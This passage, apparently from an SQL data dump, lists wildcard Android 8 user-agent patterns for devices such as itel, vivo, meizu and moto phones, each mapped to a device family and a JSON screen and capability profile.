Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; iQ1568) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; iQ5011_E) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":750,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; iQ8011) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; iQA27X_E) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; iQS805) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; iQW608) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ioutdoor X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; iris50) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_iris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; iris51) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_iris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; iris65) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_iris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; iris88) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_iris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; iris88s) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_iris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; iris90) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_iris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; itel A14) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; itel A14RU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; itel A15) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; itel A16 Plus RU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; itel A16 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; itel A16) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; itel A23) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; itel A32F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; itel P13 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; itel P13) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; itel P32) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; itel S13) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; itel S33) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; itel S42) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; itel W4003) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; itel W5001P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; itel W5003) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; itel W5504) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; itel W6001) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; mate20) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; meanIT_X1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; meanIT_X2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; meizu C9 pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; meizu C9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; meizu M8 lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; meizu M8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; meizu X8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; meizu note8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; mobiistar C1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; moto e5 (XT1920DL)) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; moto e5 cruise) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; moto e5 play) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; moto e5 plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; moto e5 supra) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; moto e5 xx) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; moto e5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; moto g(6) forge) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; moto g(6) play) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; moto g(6) plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; moto g(6)) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; moto x4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; motorola one) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; myPhone_Fun6Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; myPhone_Fun_8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; vivo 1716) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; vivo 1718) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; vivo 1723) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; vivo 1724) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; vivo 1726) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; vivo 1727) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; vivo 1801) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; vivo 1802) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; vivo 1803) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; vivo 1804) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; vivo 1806) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; vivo 1807) AppleWebKit/* (KHTML, like Gecko) Chrome','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; vivo 1807) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; vivo 1808) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; vivo 1808i) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; vivo 1811) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; vivo 1812) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; vivo 1814) AppleWebKit/* (KHTML, like Gecko) Chrome','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; vivo 1814) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; vivo 1815) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; vivo 1816) AppleWebKit/* (KHTML, like Gecko) Chrome','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; vivo 1816) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; vivo 1817) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; vivo 1820) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; vivo 1820_19) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; vivo 1908) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; xx A1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; xx A2 Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 